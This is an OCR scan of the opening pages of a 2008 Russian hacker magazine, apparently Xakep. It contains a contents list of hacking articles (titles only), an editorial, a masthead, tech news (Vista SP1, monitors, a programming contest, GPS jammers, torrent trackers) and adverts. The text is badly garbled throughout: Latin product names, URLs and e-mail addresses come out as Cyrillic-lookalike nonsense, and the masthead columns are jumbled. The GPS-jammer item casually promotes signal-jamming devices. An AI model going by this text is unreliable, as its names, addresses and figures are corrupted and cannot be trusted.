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МЕСАЫЕѴѴ5 

ВСЕ НОВОЕ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



ГЕКІШМ 

УСПЕТЬ СОХРАНИТЬСЯ 

СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ НЕДОРОГИХ ИБП 

4 ДЕВАЙСА 

ОБЗОР ЧЕТЫРЕХ НОВЫХ ДЕВАЙСОВ 

ПОБЕДА В БОРЬБЕ ЗА СКОРОСТЬ 

ТЕСТИРОВАНИЕ ДВУХДИАПАЗОННОГО А05І_ ИНТЕРНЕТ-ЦЕНТРА 
2ѴХ Е1_ Р660НТѴѴ2 ЕЕ 



100 РЕАЛЬНАЯ ПОМОЩЬ ДОМОХОЗЯЙКАМ 

УЧИМСЯ КОДИТЬ МОДУЛИ ПОДДЕРЖКИ ОБОЗРЕВАТЕЛЯ 

104 ФУНКЦИОНАЛЬНАЯ ШПИОНОМАНИЯ 

КРАТКИЙ КУРС ПЕРЕХВАТА ФУНКЦИЙ В ОЕЬРНІ 

1 1 0 ОСТОРОЖНО, ДВЕРИ ОТКРЫВАЮТСЯ 

СОБИРАЕМ НЕДЕШЕВЫЙ ДОРГЕН НА С# 

114 ТРЮКИ ОТ КРЫСА 

ПРОГРАММИСТСКИЕ ТРЮКИ И ФИЧИ НА С\С++ ОТ КРИСА КАСПЕРСКИ 



шініш і:ія 



ЗАМЕТКИ О ХАК-ФОРУМАХ 

ПРЕДВЗЯТЫЙ ОБЗОР НЕПРИВАТНЫХ ХАКЕРСКИХ 
И ОКОЛОХАКЕРСКИХ КОНФЕРЕНЦИЙ 

Х-РКОРІЬЕ 

ПРОФАЙЛ ЖАННЫ РУТКОВСКОЙ 

Х-5ТІІРР 

ФОТОГРАФИИ РАБОЧИХ МЕСТ ХАКЕРОВ 



юниксойд 

ВЕЛИКОЛЕПНАЯ СЕМЕРКА 

ОБЗОР НОВШЕСТВ В РРЕЕВ50 7.0 

ПРОРЫВ СКВОЗЬ РРР 

НАСТРАИВАЕМ РРРОЕ И РРТР ПОДКЛЮЧЕНИЯ В ІЛМІІХ 

ВО ВЛАСТИ СУПЕРБЛОКА 

ФАЙЛОВАЯ СИСТЕМА ІЛМІІХ В ПОДРОБНОСТЯХ 




ТОТАЛЬНЫЙ антивирус 

УНИВЕРСАЛЬНЫЙ АНТИВИРУСНЫЙ ЦЕНТР СВОИМИ РУКАМИ 

НА ЧТО СПОСОБНА ТВОЯ ШЕВ-КАМЕРА 

СЕМЬ НЕОБЫЧНЫХ ПРИМЕНЕНИЙ ДЛЯ САМОЙ ОБЫКНОВЕННОЙ 
ВЕБ-КАМЕРЫ 

КАК Я СТАЛ ФРИЛАНСЕРОМ 

ЗАМЕТКИ ВОЛЬНОГО СТРЕЛКА 

МОВІЬЕ ТРІСК5 

ИСПОЛЬЗУЕМ КОММУНИКАТОРЫ А5У5 НА 100% 



том 



ЕА5Ѵ НАСК 

ХАКЕРСКИЕ СЕКРЕТЫ ПРОСТЫХ ВЕЩЕЙ 

ОБЗОР ЭКСПЛОЙТОВ 

МНОГО НОВЫХ СПЛОИТОВ 

ЗАПАРОЛЕННАЯ ВЛАСТЬ 

ЩЕЛКАЕМ ПАРОЛИ ОТ ОРАСЬЕ, КАК ОРЕШКИ 

В ГОРЯЧЕМ СЕРДЦЕ ФАЙРВОЛА 

ВЗЛОМ ПОРТАЛА ПОПУЛЯРНОГО БРАНДМАУЭРА 

ТЫ - ПОВЕЛИТЕЛЬ АРМИИ ЛОАДЕРОВ! 

УНИВЕРСАЛЬНЫЕ ПРИЕМЫ БЫВАЛОГО КРЭКЕРА 

РАСКРЫВАЕМ КОД 

ДИЗАССЕМБЛИРОВАНИЕ С# ПРОГРАММ ОТ А ДО 1 

Х-ТООЬБ 

ПРОГРАММЫ ДЛЯ ВЗЛОМА 



116 МОБИЛЬНАЯ 5ІМРН0ЫІА 

ПОЛТОРА ДЕСЯТКА МОБИЛЬНЫХ АККАУНТОВ НА ОДНОЙ 5ІМЖЕ 

122 СПУТНИКДЛЯ ВСЕЙ СЕМЬИ 

ВЫНОС КАРДШАРИНГА НА ТЕЛЕВИЗОР 

ХАКЕР. РКО 

1 28 КОДОВОЕ ИМЯ «І_ОЫСНОКН» 

ѴѴІЫ00ѴѴ5 5ЕРѴЕР 2008: ОБЗОР НОВОВВЕДЕНИЙ 

132 РЕЦЕПТЫ ПРИГОТОВЛЕНИЯ КАЛЬМАРА 

501ІЮ: НАСТРАИВАЕМ КОНТРОЛЬ ДОСТУПА И ОПТИМИЗИРУЕМ КЭШ 

138 КАК ДВА ЛИНКА ОБУЗДАТЬ 

ДОБИВАЕМСЯ ЭФФЕКТИВНОЙ РАБОТЫ НЕСКОЛЬКИХ ИНТЕРНЕТ-КАНАЛОВ 
ВО РРЕЕВЗБ 

144 ЖИЗНЬ СЕРВЕРА БЕЗ В500 

СКРЫТЫЕ РЫЧАГИ УПРАВЛЕНИЯ ЯДРОМ ѴѴІМ00ѴѴ5 5ЕРѴЕР 2003 



148 ДЕПРИВАЦИЯ: НАД ПРОПАСТЬЮ СНОВИДЕНИИ 

ФИЛИГРАННАЯ ТЕХНИКА ТРАНСФОРМАЦИИ СНА 

152 РАО ІІИІТЕО 

БОЛЬШОЙ РАО 

156 ПОДПИСКА 

ПОДПИШИСЬ НА НАШ ЖУРНАЛ 

158 ДИСКО 

8,5 ГБ ВСЯКОЙ ВСЯЧИНЫ 

160 Ш/ѴІ2 




ІПІГО 



Свобода информации и знаний постепенно меняетмир. 
То, что раньше было прерогативой государств, спецслужб 
и корпораций постепенно спускается к обычным людям. 
Массово открываются протоколы и исходники софта, бес- 
платные орепвоигсе-платформы постепенно заменяют 
закрытые решения в тех сферах, где это возможно. 

Только подумай: теперь даже прослушать 65М А5/1 
телефон не большая проблема. Алгоритмом взлома 
только что поделился со всем миром Бкурег из ТНС 
на конференции НІТВ 2008. Все, что надо - это девайс 
примерно за $700 и определенные знания в голове, 
которые можно получить в интернете. И можно не со- 
мневаться в том, что это обстоятельство очень быстро 
улучшит протокол. 



Свобода информации и знаний начинает управлять 
миром. То, что раньше было доступно единицам, стано- 
вится доступно всем. 

Это же классно, когда о баге в протоколе узнает весь 
мир, а не только спецслужбы. Когда обладая специ- 
фикацией и исходниками некоторых частей ѴѴІпсІоѵѵз 
орепвоигсе-разработчики могут писать классный 
софт. Когда любой человек может бесплатно за 5 
минут сделать свой блог на ѴѴогсІргевв и делиться 
своими мыслями со всем миром. 

Все это создаеттот новый мир, на который мы с тобой 
можем легко влиять, улучшая и меняя его под себя, 
пікііогг, гл. ред.Х 
исіаіііе.ііѵеригпаі.сот 



/Редакция 


/Аг( 




>Подписка 


>Главный редактор 


>Арт-директор 


/РиЫізІііпд 


Марина Г ончарова 


Никита «пікіІ 022 » Кислицин 


Евгений Новиков 


(допсИагоѵа@датеІапсі.ги) 


(пі кііогйгеаі. хакер, ги) 


(поѵікоѵ.е@датеІапсі.ги) 


> Издатели 


тел.: (495)935.70.34 


>Выпускающий редактор 


>Верстальщик 


Рубен Кочарян 


факс: (495) 780.88.24 


Николай«догІ»Андреев 


Вера Светлых 


(поаИ@датеІапсІ.ги) 


> Горячая линия по подписке 


(догіитйгеаі. хакер, ги] 


(зѵеиуЬйдатеІапсі.ги) 


Александр Сидоровский 


тел.: 8(800) 200.3.999 


>Цветокорректор 


(зісіогоѵзку@датеІапсі.ги) 


Бесплатно для звонящих из России 


>Редакторы рубрик 


Александр Киселев 


>Учредитель 


> Для писем 


ВЗЛОМ 


(кізеіеѵйдатеіапсі.ги) 


ООО «Гейм Лэнд» 


Дмитрий«РогЬ» Докучаев 


>Фото 


>Директор 


101000, Москва, 


(ІюгЬйгеаІ.хакер.ги) 


Иван Скориков 


Дмитрий Агарунов 


Главпочтамт, а/я 652, Хакер 


РС 20ЫЕ и 11 N115 


>Иллюстрации 


(с!ті[гі@датеІапсІ.ги) 


Зарегистрировано в Министерстве 


Степан «віер» Ильин 


Родион Китаев 


>Управляющий директор 


Российской Федерации по делам 


[зіерйгеа 1. хакер, ги) 


(госііопкіійтаіі.ги] 


Давид Шостак 


печати, телерадиовещанию и 


СЦЕНА 


Стас Башкатов 


(збоз[ак@датеІапсІ.ги) 


средствам массовых коммуникаций 


Петя и Волк 


(сЫІІ.дипЙдтаіІ.сот) 


>Директор по развитию 


ПИ Я 77-1 1 802 от 1 4 февраля 2002 г. 


(тадагопейгеаі.хакер.ги) 


Паша Романовский 


Отпечатано в типографии 


ІІМІХОЮ, ХАКЕР.РРО и Р5УСН0 


/хакер. ги 


(готапоѵзкі@датеІапсІ.ги) 


«ЗсапѴѴеЬ», Финляндия. 


Андрей «АпсІгизЬоск» Матвеев 


>Директор по персоналу 


Т ираж 1 00 000 экземпляров. 


(апбгизИоскЙгеакхакер.ги) 


>Редактор сайта 


Михаил Степанов 


Цена договорная. 


КОДИ Н Г 


Леонид Боголюбов 


(з[ерапоѵт@датеІапб.ги) 


Мнение редакции не обязательно 


Александр «Ог. Кіоипіі» Лозовский 


(хайгеаі. хакер. ги) 


>Финансовый директор 


(аіехапсіегйгеаі.хакер.ги) 




Леонова Анастасия 


совпадает с мнением авторов. 


ФРИКИНГ 


/Реклама 


(Іеопоѵа@датеІапсІ.ги) 


Редакция уведомляет: все материалы 


Сергей «01іпуі «Долин 


руководитель отдела рекламы 


>Редакционный директор 


в номере предоставляются как 


[сіііпуійгеаі.хакер.ги) 


цифровой группы 


Дмитрий Ладыженский 


информация к размышлению. Лица, 


Литературный редактор 


Евгения Г орячева 


(ІасІу 2 Ііепзкіу@датеІапс 1 .ги) 


использующие данную информацию 


Дмитрий Лященко 


(догуасПеѵа@датеІапсІ.ги ) 


>РК-менеджер 


в противозаконных целях, могут 


(ІуавЬсЬепкойдатеІапсІ.ги) 


>Менеджеры отдела 


Наталья Литвиновская 


быть привлечены к ответственности. 


Ольга Емельянцева 


(Іі1:ѵіпоѵзкауа@датеІапсІ.ги) 


Редакция в этих случаях ответственности 


/оѵо 


(оІдаетІ@датеІапсі.ги) 


/Оптовая продажа 


не несет. 


>Выпускающий редактор 


Оксана Алехина 


Редакция не несет ответственности 


Степан «5іер» Ильин 


(аІекЬіпа@датеІапсІ.ги) 


>Директор отдела 


(зіерйгеа 1. хакер, ги) 


Александр Белов (ЬеІоѵ@датеІапсІ.ги) 


дистрибуции 


за содержание рекламных 


>Редактор Цпіх-раздела 


> Трафик менеджер 


Андрей Степанов 


объявлений в номере. 


Андрей «АпсІгивЬоск» Матвеев 


Марья Алексеева 


(апсІгеу@датеІапсІ.ги) 


За перепечатку наших материалов 


(апсІгизЬоскЙгеаІ.хакер.ги) 


(аІекзееѵа@датеІапсІ.ги) 


>Связьс регионами 


без спроса — преследуем. 


>Монтаж видео 


>Директор корпоративного отдела 


Татьяна Кошелева 




Максим Трубицын 


Лидия Стрекнева 
(Зігекпеѵа@датеІапсІ.ги) 


(козбеІеѵа@датеІапсІ.ги ) 





Медапеѵѵз 



МАРИЯ «МІРВІІХ» НЕФЕДОВА 

/ мігшшзшооіск.піі / 



Юбо всем за последний месяі. 




Эксклюзив 
от «Эльдорадо» 

По-настоящему уникальную и эксклюзивную вещь предста- 
вила нашему вниманию компания «Эльдорадо». Новейший 
22" монитор ѴІ_Е0221\л/т со светодиодной подсветкой от 
известных мониторных мастеров ѴіеѵѵЭопіс способен удовле- 
творить как нужды киноманов, отдающих предпочтение НідЬ- 
Оебпібоп’у, и опытных геймеров, так и просто требовательных 
к цветопередаче пользователей. Цветовой охватновинки в 
1 18% ІЧТ5С и динамическая контрастность 12000:1 не имеют 
аналогов в мире — обычные мониторы способны охватить 
лишь 70-75% данного стандарта. Прибавим кэтому время 
отклика в 5 мс, максимальное разрешение экрана 1 680 х 1 050, 
встроенные стереодинамики 5П5ѴѴ0ѴѴ НЮ и веб-камеру и 
получим отличную, во всех отношенияхудобную вещь. 
Интересно и то, что в течение трех месяцев этот монитор в 
России можно будет приобрести только в сети магазинов 
«Эльдорадо», и его цена составит $700 против $800, реко- 
мендованных для европейского рынка. Учитывая, что схожие 
по характеристикам товары стоят порядка $1000 и выше, 
предложение «Эльдорадо» более чем выгодно итакой шанс 
упускать не стоит :) . 



$3 млрд — в такую сумму оценили Яндекс в компании Зііісоп АІІеу Іпзісіег, опубликовав 
рейтинг самых дорогих стартапов. ѴѴІкіресІіа стоит более чем вдвое дороже : $7 млрд. 




МісгозоН командует: «Роботы, к бою!» 

Создатель ѴѴіп б оѵѵз не перестаетудивлять публи- ков, имеющий размер 400 Мб. Если ты с детства 



ку своими новыми проектами. Пока юзеры ругают 
ѴѴіпбоѵѵз Ѵівіа за глюкавость, МісгозоЙ полностью 
переводит М50Ы на русский язык и занимается 
самыми разнообразными стартапами. На днях ею 
были анонсированы соревнования по созда- 
нию (тут надо задержать дыхание)... роботов! 
Фестиваль РоЬоСЬатрз 2008 не подразумевает 
конструкторского кубка, где умельцы собирают 
дроидов из того что попалось под руку, тратя 
бесчисленное количество денег на камеры, 
сервоприводы, аккумуляторы и дорогущую элек- 
тронику. Вместо этого М іеговой предлагает всем 
желающим, не тратя ни копейки, создать и за- 
программировать робота виртуального — на базе 
своей специально разработанной платформы. 
Участник может установить программу РоЬобсз 
Эіибіо 2008, загруженную с официального сайта 
соревнований ѵѵѵѵѵѵ. гоЬосЬатрз.сот . и сразу 
же приступить кувлекательнейшему процессу 
конструирования дроида. О богатстве возможно- 
стей говоритхотя бы ЭйК-пакетдля разработчи- 



мечтаешь создать своего собственного робота, 
то можешь приступить прямо сейчас и принять 
участие в одном из 6 соревнований: 

1. прохождение лабиринта; 

2 . исследование поверхности планеты Марс; 

3. вождение по городу сучетом трафика, дорож- 
ных знаков и светофоров; 

4 . спасательная миссия в городе, разрушенном в 
результате землетрясения; 

5 . сумо (участникам предстоит вытеснить робота- 
оппонента за ринг); 

6. турнир, в котором необходимо показать 
превосходство своего робота перед другими 
участниками. 

Соревнования пройдут 27-30 октября в Л ос- Анд- 
желесе. Между тем, на портале М50Ы уже дос- 
тупен «Центр разработчика МісгозоЛ РоЬобсз» 
( т5бп2.тісго5оЮсот/еп-из/гоЬобс5/с1еі : аии. 
азрх ). где можно найти форумы, материалы для 
обучения по КоЬобсз Эіибіо 2008 и другую полез- 
ную информацию. 
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Коек 5оІісІ - Неагі ТоисГііпд 



Быстрее, 

чем по проводам! 




А81І8 ѴѴЫ60М 

Компактный ІІЗВ 2.0 адаптер 802.1 1 N 



АЗІІЗ ѴѴІ--500ѴѴ 

ПЕРВЫЙ УНИВЕРСАЛЬНЫЙ БЕСПРОВОДНОЙ МАРШРУТИЗАТОР 802.1 114 



А81І8 ѴѴЫЗОМ 

Высокопроизводительный 
адаптер РСІ 802. 1 1 N 



• Сертифицирован по программе Соппесі ѵѵіІН ІпІеГ Сепігіпсг : максимум производительности при использовании 
с ноутбуками на платформе Іпіеі® нового поколения. 

• 5-ти кратное увеличение скорости передачи данных и 2-х кратное увеличение зоны охвата сети. 

• Поддержка протокола 802.1 1 п ОгаЙ2.0 (300 Мбит/с), полная обратная совместимость с 802.1 1 Ь/д. 

• АЗІІЗ Е23е1ир - легкая настройка защищенного беспроводного соединения. 

• 2 порта ЫЗВ 2.0 для подключения принтера, жесткого диска и веб-камеры. 

• АЗІІЗ Ооѵѵпіоаб Мазіег- качайте файлы из сети Іпіегпеі, даже когда Ваш компьютер выключен. 



Всемирная гарантия 2 года ѴѴѴѴѴѴ.аЗІІЗ.Ги Горячая линия А5115: (495) 23-11-999 



Партнеры: Москва (495): ВОЗТОМѵѵѵѵѵѵ.ЬозІоп.ги, БЮРОКРАТ (495) 745-55-11 ,0Ю1 (495) 22-11-111, ПИРИТ-Дистрибуция (495) 974-321 0, ТКІМІТѴ-ЕІЕСТК0МІС5ѵѵѵѵѵі/.Ігі-еІ.ги, МеІгоСазЬ&Саггуѵѵѵѵѵѵ.теІго-сс.ги, Мвидео шлѵ.тѵісіео.ги, 
Месііа Магкі ѵѵѵм.теФіатагкІги, Техносила ѵѵѵѵѵѵ.ІесЬпозіІа.ги, Эльдорадо ѵѵѵѵѵѵ.еісіогасіо.ги, Белый Ветер - ЦИФРОВОЙ 730-30-30, ЮМ 5-444-333, Неоторг 223-23-23, НИКС 974-33-33, Санрайз 542-80-70, СтартМастер 785-85-55, Ультра 
Электронике 775-7566, Формоза 234-21 -64, Форум Компьютере 775-77-59, Ф-Центр 1 05-64-47, ТепТоІсІ Сгоир 580-6385, ТРК 642-47-29, Электрон-Сервис 737-44-99, НТ Компьютер (495) 363-93-93, ІІЗМ Сотриіегз (495) 775-82-02 
С-Петербург(812): КЕЙ 074, Компьютерный Мир 333-00-33, АІІВАКомпьютеры 325-69-20, «N5 (8 12) 31 6-1 3-60 

Архангельск: Норланд (8182) 26-90-10; Белгород: Элси (4722) 55-86-11; Воронеж: РЕТ (4732) 77-93-39; Владивосток: Э№ (4232) 300-454; Екатеринбург: Трилайн (343) 378-70-70, Белый Ветер Екатеринбург (343) 291-10-00, НТ 
Компьютер (343) 379-31-68; Жуковский: Байт (248) 7-41-38; Краснодар: Владос (861) 210-10-01 ; Махачкала: Фирма АС (8722) 68-06-05; Мурманск: Мега Импекс (8152) 477-477; Новокузнецк: Титан (3843) 70-38-38; Новосибирск: ЗЕТ 
НСК (383) 346-4842, Техносити (383) 21 2-53-33, НТ Компьютер (383) 344-99-04; Петрозаводск: Компания «Р1 » (8142) 781-323; Пермь: НТ Компьютер (342) 237-1 5-73; Псков: Все для ПК (8112) 72-72-75; Ростов-на-Дону: Иманго (863) 232- 
47-1 8, НТ Компьютер (863) 295-30-20; Солнечногорск: Компьютерный мир (469-26) 4-87-69; Тюмень: Техносити (3452) 26-1 9-72; Уфа: Форте ВД (3472) 600-000, Кламас (3472) 91-21 -12 









Российский финал «Ітадіпе Сир» 2008 






тадтедсир 



1 1-гоапреля в Москве, в ДКМАИ, прошел 
российский финал кубка технологий — «Ітадіпе 
Сир» [ ѵѵѵѵѵѵ.ітааіпесир.ги ]. Этот крупнейший 
в мире технологический конкурс проводится 
уже 6 лет, начиная с 2003 года, при поддержке 
МісгобоЛ, а также ряда других компаний и фон- 
дов, в числе которых даже ЮНЕСКО. Главные его 
цели — привлечение внимания молодыхлюдей 
(в основном студентов) ктеме инноваций в 
сфере ІТ, «наведение мостов» между молодежью 
разных стран, разработка и создание решений 
глобальных мировых проблем, а также развитие 
технологического прогресса в целом. На этот раз 
в соревновании принимаютучастие команды из 
1 17 стран. 

Тема конкурса в этом году звучиттак: «Пред- 
ставьте мир, в котором технологии помогают под- 
держивать стабильную окружающую среду». В 
нашем финале были представлены четыре кате- 
гории из девяти существующих в «Ітадіпе Сир». 
Это «Программные проекты», «Проект Хошими» 
по созданию игровой стратегии, «Алгоритмы», 
и онлайновый конкурс«Цифровая фотография 
— фотоэссе» ( ѵ\лл/ѵѵ. рбоіосир.ги ). 

Итоги российского тура выглядят следующим 
образом. Первое место среди более чем 400 
участников в категории «Программные проекты» 
заняла сборная команда питерских ВУЗов, со 




своим проектом «Агі па», ориентированным на 
повышение эффективности работы лесопожар- 
ных служб. Представлять Россию на финале 
кубка технологий, который состоится в июле во 
Франции, будутименно они — Анатолий Никитин 
из СПбГУ ИТМО, Роман Белов из СПбГУ и Дарья 
Элькина из СПб ЛЭТИ. Второе место отошло 
ученикам Нижегородского государственного 
университета им. Н.И.Лобачевского с проектом 
«. Бібе», имитирующим интерактивное состояние 
окружающей среды и влияние на нее человека. 
«Бронза» же досталась сборной московских 
ВУЗов, с их прототипом беспилотного летатель- 
ного аппарата «АігРапдег», при помощи которого 



возможно осуществлять мониторинг местности. 
Победителем категории «Алгоритмы» стал Бойко 
Алексей из Томска, а финалистом «Проекта 
Хошими» команда РесЮеѵіІв из Иваново (Илья 
Гребнов, Сергей Гребнов). 

Помимо самого конкурса на «Ітадіпе Сир» 
состоялся круглый стол по теме «Коммер- 
циализация технологий. Новые возможности 
для студентов в России» при участии члена 
команды-победителя международного финала 
Ітадіпе Сир 2005, Ивестиционно-технологиче- 
ского Альянса и Фонда содействия развитию 
малых форм предприятий в научно-техниче- 
ской сфере. 
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Стань .футбольным нонедхорлм Собери команду иечты 
Прпкѵі участие и Чемпионате Еироны 2008 ч<р^іісь іо самый желанный футбольный трофей, 



тедапеѵг 



Первый сервис-пак для 
Ѵізіа и третий для ХР 

Итак, свершилось! В апреле, чуть боль- 
ше года спустя после релиза самой ОС, 
вышел 5Р1 для ѴѴіпсІоѵѵз Ѵізіа. Вокруг 
первого пакета обновлений циркулиро- 
вало множество слухов и домыслов, но 
теперь ничего домысливать уже не нуж- 
но, можно просто во всем убедиться лич- 
но. Во-первых, теперь Ѵізіа распознает 
большую часть существующего железа 
и ПО. В ее «базе знаний» сейчас свыше 80000 девайсов и компонентов, 
а это в два раза больше, чем было на момент выхода системы. Также, 
Ѵізіа отныне подружится и с основными 1 50-ю бизнес-приложениями 
от именитых производителей, в числе которых АсІоЬе, Сізсо, ІВМ, Огасіе, 
5ип и другие. 

Во-вторых, устранена большая часть ошибок, приводивших ко всевоз- 
можным эррорам. Согласно официальной информации, стабильность 
системы возросла вдвое. Говоря о стабильности — пофиксили чересчур 
медленное копирование файлов, тормоза при выходе из спящего режи- 




ма у ноутбуков и улучшили работу с беспроводной связью. 

В-третьих, изменениям подверглась проверка подлинности ОС. 

После установки 5Р1 Ѵізіа перепроверитсебя на предмет двух самых 
распространенных способов обхода проверки активации. В случае 
положительного результата Ѵізіа их аннулирует и раз в час будет пред- 
лагать провести активацию уже нормальным способом. Вошли в пакет 
обновлений и все предыдущие патчи из области безопасности, и была 
улучшена работа с программами, распознающими вредоносное ПО, то 
есть, с различными антивирусами и тому подобными сканера ми -мони- 
торам и. 

В остальном, мелких и не очень исправлений и добавлений много. 

С полным их списком можно ознакомиться на официальном сайте. К 
примеру, Ѵізіа теперь оборудована поддержкой нового стандарта И ЕРІ и 
форматом для флеш-накопителей ЕхРАТ. 

Но на выходе 5Р1 для Ѵізіа новости от Місгозоіі не заканчиваются. 
Практически одновременно с ним, лишь на пару недель позже, вышел 
5РЗ для нетленной ХР. По сути, его уже окрестили полным собранием 
всех аддонов, появившихся за те три года, что прошли с момента 5Р2. 
Однако, помимо этого, нельзя не отметить портированные из Ѵізіа 
элементы, такие как Ыеіѵѵогк Ассезз Ргоіесііоп и ѴѴіпсІоѵѵз Ітадіпд 
Сотропепі. Очевидно, все плавно движется ктому, о чем Місгозоіі гово- 
ритуже давно — к прекращению поддержки ХР. А выход 5РЗ это своего 
рода лебединая песня. 



По мнению аналитиков компании МоЬіІе КезеагсЬ Сгоир, число іРЬопе’ов в России составляет 



500000 . Больше только в Китае и США. Неслабо навезли контрафакта, да? 




Шире, красочнее, 
популярнее 

Этой весной компания І_Ѳ решила порадовать поклонников качественного 
изображения сразу несколькими новыми продуктами. Речь, конечноже, 
идето мониторах. Первая серия новинок — ѴѴ42 — представитнам широ- 
коформатные ЖК-дисплеи сдиагоналями в 19", 20" и 22". Характеристики 
таковы — динамическая контрастность 8000:1 , время отклика 5 мс и система 
І_6 ^-ЕЫОІ N Е, позволяющая значительно улучшить изображение. Модели 
серии, оканчивающиеся на букву «Т» (например ѴѴ2042Т), оснащены 
цифровым интерфейсом ОѴІ-й, который поддерживает систему против 
незаконного копирования контента РЮСР. 

Вторая новая серия — ѴѴОО — ориентирована на профессионалов и «гур- 
манов» в области визуала. Два дисплея ѴѴ2600НР и ѴѴ3000Н, обладающие 
диагоналями в 26" и 30" дюймов, соответственно, должны идеально подой- 
ти тем, кто много и серьезно работаете графикой — расширенная цветовая 
гамма, полная поддержка ГЮ, максимальное разрешение 1 920 х 1200 и 2560 
х 1600. Но, конечно, и цена у гигантов тоже немаленькая — $1400 за модель 
ѴѴ2600НР и $2250 за ѴѴ3000Н. 



В прошлом году жертвами фишинга стали 3,6 МИЛЛИОНОВ клиентов финансовых 
сервисов. Они потеряли в общей сложности $3,2 млрд. 
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Ваши способности. Наше вдохновение. 



В современном мире ИТ вам потребуется сервер, 
который железно будет работать. 

Поэтому, создавая ѴѴІпсіоѵѵб Бегѵег® 2008, 
мы применили такие инновационные решения, 
как отказоустойчивая кластеризация и возможность 
установки в режиме Бегѵег Соге. Эти решения 
помогают избегать угрозы безопасности 
и обеспечивать сверхвысокую надежность! 

Встречайте новый ѴѴІпсіоѵѵб Бегѵег 2008 

на ѵѵѵѵѵѵ.ѵѵіпсіоѵѵ5-5егѵег.ги 



5егѵег2008 





о) 




и 



О 2008 Місгозо^І: Согрогаііоп. Все права защищены. Владельцем товарных знаков Місгозо^, ѴѴІпсіоѵѵб Бегѵег, зарегистрированных на территории США и/или других стран, 
и владельцем авторских прав на их дизайн является корпорация Місгобо^і. Другие названия компаний и продуктов, упомянутых в тексте, могут являться зарегистриро- 
ванными товарными знаками соответствующих владельцев. Реклама. 







08 Япаі гезиііз 




Команда ИТМО 
выиграла в Битве 
Мозгов 

С 6 по 9 апреля в канадском городке Банфф на западе страны проходил 
крупнейший и старейший мировой чемпионатпоспортивномупрограм- 
мированию — АСМ ІСРС, главным спонсором которого является компания 
ІВМ. Проводимое в 32 раз мероприятие собрало 100 сильнейших команд 
со всего мира, причем одно из самых многочисленных представительств 
былоу России: всего приехало 1 1 российских команд. 

В ходе пятичасового соревнования командам-участникам было предло- 
жено 1 1 задач, для решения которыхтребовались незаурядные знания в 
области математики и программирования. В итоге, решив 8 из 1 1 задач, 
победила команда ИТМО — института точной механики и оптики из Петер- 
бурга. Второе места заняли студены МІТ из массачусетского технологиче- 
ского, третье и четвертое — Львовский университет и ИжГТУ, соответст- 
венно. Всего 5 российских командзаняли призовые места. 




СаіЦвдІ 



Метаііопаі 

Ргйдгзттіпд 



АСМ (пТетаік 
СсШедіаіе Ргодгаі 
Сопіезі 
ѴѴогМ ЙпаЯа 



ѴіоПЛ Рі 






Немецкая ѴѴікіресІіа содержит 700 тысяч статей и является вторым по величине 

разделом энциклопедии после английского. В сентябре 2008 года она выйдет в тираж 
на бумаге. 



5ип ТесН Оауз в Питере 

В начале апреля в Санкт-Петербурге, вот уже в третий раз, прошли 
российские Бип ТесЬ Оауз. Это ежегодное мероприятие, в течение 1 0 лет 
организуемое компанией Бип Місгозузіетв по всему миру, представляет 
собой серию конференций и проводится в целях обмена опытом, попу- 
ляризации и развития такихтехнологий, какБоІагіз и баѵа. В этом году в 
Питере с докладами побывали создатель ОеЬіап 6І\ІіѴі_іпих и вице-пре- 
зидент Бип МісгозузІюппБ по контактам с сообществом разработчиков 



— Ян Мердок (Іа п Мигбоск), Рич Грин (РісЬ Ѳгееп] — исполнительный 
вице-президент руководителя подразделения Бип Місгозузіетз, 
отвечающего за ПО, и многие другие. Основными темами 2008 года стали 
баѵаРХ, Боіагіз, бІаззРізЬ, баѵаБЕ7, ОрепбйК и так далее. Всего за эти 
три дня было зачитано аж 72 доклада и проведено 6 мастер-классов. 
Ознакомиться со всем этим более детально можно на сайте мероприятия 

— ѵѵѵѵѵѵ.беѵеІорег5.5ип.гиДесЬбаѵ5 . 
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Споат как Стиль ІіЗАМ от ^УМА 
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Первый 

«музыкальный» 
тариф от МТС 

МТС и медиа-холдингАІ представляют первый тариф для 
любителей альтернативной музыки — «Альтернатива». Або- 
нентам предлагается рядуникальныхуслуг, разработанных 
совместно с Первым Альтернативным Музыкальным телека- 
налом А-ОЫЕ. Среди них всевозможные конкурсы, викторины, 
оперативные новости из сферы музыки и нетолько, собствен- 
ный ѴѴАР-портал, огромный выбор мобильной музыки и так 
далее. Цитируя главного директора канала А-ОЫЕ Михаила 
Евграфова, тариф призван объединить вокруг себя комьюнити 
людей, «которые хотят быть собой и при этом не хотят быть, 
как все». Тому хорошо поспособствуют, например, бесплатные 
ММ5 внутри тарифа или возможность бесплатного просмотра 
А-ОЫЕ прямо с мобильного телефона. 



Интересная статистика: почти 



половину всего интернет-тра 



І И8ІЗКІ 



( 40 %) 



потреоляют самые 



активные сетевые пользователи 



которых всего-навсего 0. 



5МІ7 



его числа юзеров. 



5 °/от 



Время бороться с 6Р5 

Модули глобальной системы 
позиционирования (ОРЗ) 
успешно прижились в 
автомобильной навигации, 
судоходстве и авиации. 

Их интегрируют в ошейни- 
ки домашних животных и 
используют для мониторинга 
общественного транспорта. 

По заявлению известней- 
ших футуристов, уже к 2025 
году чипы 0Р5 будут имплантированы большинству жителей США. Как тут не 
задуматься об анонимности? В глобальном смысле этого слова! На рынке уже 
сейчас доступны десятки моделей так называемых С Р5]аттег’ов, излучающих 
помехи в диапазоне частот, которые используются спутниками глобальной сис- 
темы позиционирования. Проблема решается, что называется, в лоб, но зато как 
действенно! Лишенный возможности принимать сигналы с нужного количества 
спутников, любой 6Р5-адаптер оказывается бесполезной игрушкой, безуспешно 
пытающейся определить координаты своего месторасположения. Все большую 
популярность набирают подавители сигнала 6Р5, работающие от прикуривателя 
автомобиля, дальность таких гаджетов составляет примерно 5 метров. Интерес- 
но, научились ли сними бороться создатели продвинутых автомобильных сигна- 
лизаций с возможностью слежения за автомобилем через ѲР5 (за обслуживание 
такой сигнализации взимается баснословная абонентская плата]— или свободно 
продаваемая безделушка, ценою 265$, может свести все их старания на «нет»? 




Жизнь и смерть Іоггепі-трекеров 



«ВіГГоггепІ — зло! Натрекерах — один варез! 
Закрыть немедленно!», — канадская ассоциа- 
ция звукозаписывающих компаний всерьез 
взялась за известный торрент-трекер бетопоіб. 
сот . Привязались — не отцепишь: под сильным 
давлением властей трекер был отключен 9 
ноября. С тех пор периодически подавали признаки жизни то сам сайт, то 
форум, то серверы. Вернуть трекер кжизни удалосьтолько в апреле, когда 
он полностью восстановил работу, переехав не куда-нибудь, а в сеть укра- 
инского провайдера Соіосаіі. Сам основатель то л и тщательно шифруясь, 
